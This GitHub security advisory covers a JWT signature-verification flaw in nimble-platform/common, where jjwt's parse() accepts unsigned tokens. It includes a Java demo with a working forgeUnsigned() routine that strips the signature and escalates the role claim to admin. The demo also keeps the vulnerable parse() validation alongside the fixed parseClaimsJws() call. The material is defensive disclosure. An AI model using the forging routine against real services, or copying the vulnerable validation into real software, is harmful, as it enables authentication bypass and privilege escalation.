Published by oliver-jung
GHSA-fjq8-896w-pv28
Jul 26, 2021
Package
No package listed
Affected versions
<3b96cb0
Patched versions
>=3b96cb0
Description
Impact
https://github.com/nimble-platform/common before commit 3b96cb0 did not properly verify the signature of JSON Web Tokens.
An attacker can therefore present a JWT with attacker-chosen claims that the library treats as valid, without knowing the signing key.
Being able to forge JWTs may lead to authentication bypass in services that rely on this library to validate tokens.
Patches
Problem patched on master in version 3b96cb0 and above. Relevant commits are 12197a7 and a59ad46.
Workarounds
https://github.com/nimble-platform/common, in https://github.com/nimble-platform/common/blob/master/utility/src/main/java/eu/nimble/utility/validation/ValidationUtil.java#L39, uses the jjwt parse method to parse the received JWT.
The parse method does not enforce a signature: a token whose signature segment has been stripped (an unsigned JWT) is parsed and its claims are returned without any cryptographic check, so an attacker can edit the claims and drop the signature.
To correctly verify the signature of a JWT, use the parseClaimsJws method instead: it accepts only a signed JWS, verifies the signature against the configured signing key, and throws on an unsigned or tampered token. If updating to 3b96cb0 is not possible, apply the same change in your own copy of ValidationUtil.
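The following is an added example, not nimble-platform's ValidationUtil code. It assumes the jjwt 0.9.x API (io.jsonwebtoken:jjwt:0.9.1 with Jwts.parser()) and uses a constructed demo secret. It shows the forged token an attacker builds by stripping the signature and rewriting a claim, the vulnerable parse call accepting it, and the parseClaimsJws call rejecting it while still accepting the genuine signed token.

```java
// Added example; not nimble-platform's ValidationUtil. Assumes the jjwt 0.9.x API
// (io.jsonwebtoken:jjwt:0.9.1, Jwts.parser()); KEY below is constructed for the demo.
import io.jsonwebtoken.Claims;
import io.jsonwebtoken.Jws;
import io.jsonwebtoken.Jwt;
import io.jsonwebtoken.JwtException;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;

import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class JwtParseVsParseClaimsJws {

    // Constructed demo secret (assumption): a real service loads its key from configuration.
    private static final byte[] KEY =
        "constructed-demo-secret-long-enough-for-hs256-usage".getBytes(StandardCharsets.UTF_8);

    // Vulnerable pattern (the pre-fix ValidationUtil shape): parse() only checks a
    // signature if the token carries one, so an unsigned token is returned as-is.
    static Claims validateVulnerable(String token) {
        Jwt<?, ?> jwt = Jwts.parser().setSigningKey(KEY).parse(token);
        return (Claims) jwt.getBody();
    }

    // Hardened pattern: parseClaimsJws() accepts only a signed JWS and verifies it
    // against KEY. An unsigned token raises UnsupportedJwtException and a modified
    // payload raises SignatureException; both extend JwtException.
    static Claims validateHardened(String token) {
        Jws<Claims> jws = Jwts.parser().setSigningKey(KEY).parseClaimsJws(token);
        return jws.getBody();
    }

    // Attacker step: reuse the legitimate header, swap in attacker-chosen claims,
    // and drop the signature segment. No secret is needed to build this.
    static String forgeUnsigned(String legitToken, String claimsJson) {
        String header = legitToken.split("\\.")[0];
        String payload = Base64.getUrlEncoder().withoutPadding()
            .encodeToString(claimsJson.getBytes(StandardCharsets.UTF_8));
        return header + "." + payload + ".";   // "header.payload." : two dots, empty signature
    }

    public static void main(String[] args) {
        String legit = Jwts.builder().setSubject("alice").claim("role", "user")
            .signWith(SignatureAlgorithm.HS256, KEY).compact();
        String forged = forgeUnsigned(legit, "{\"sub\":\"alice\",\"role\":\"admin\"}");

        System.out.println("parse()          legit  -> role=" + validateVulnerable(legit).get("role"));
        // Vulnerable path: the unsigned, rewritten token is accepted and role is "admin".
        System.out.println("parse()          forged -> role=" + validateVulnerable(forged).get("role"));
        System.out.println("parseClaimsJws() legit  -> role=" + validateHardened(legit).get("role"));
        try {
            validateHardened(forged);
            System.out.println("parseClaimsJws() forged -> ACCEPTED (unexpected)");
        } catch (JwtException e) {
            // Expected: UnsupportedJwtException ("Unsigned Claims JWTs are not supported.")
            System.out.println("parseClaimsJws() forged -> rejected: " + e.getClass().getSimpleName());
        }
    }
}
```

Run it with jjwt 0.9.1 (and its jackson dependency) on the classpath. The point to take from it is that the two methods differ in what they require, not in how they verify: parse() will verify a signature that is present, but it lets a token without one through, which is exactly what a forger sends.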
References
https://jwt.io/
For more information
If you have any questions or comments about this advisory: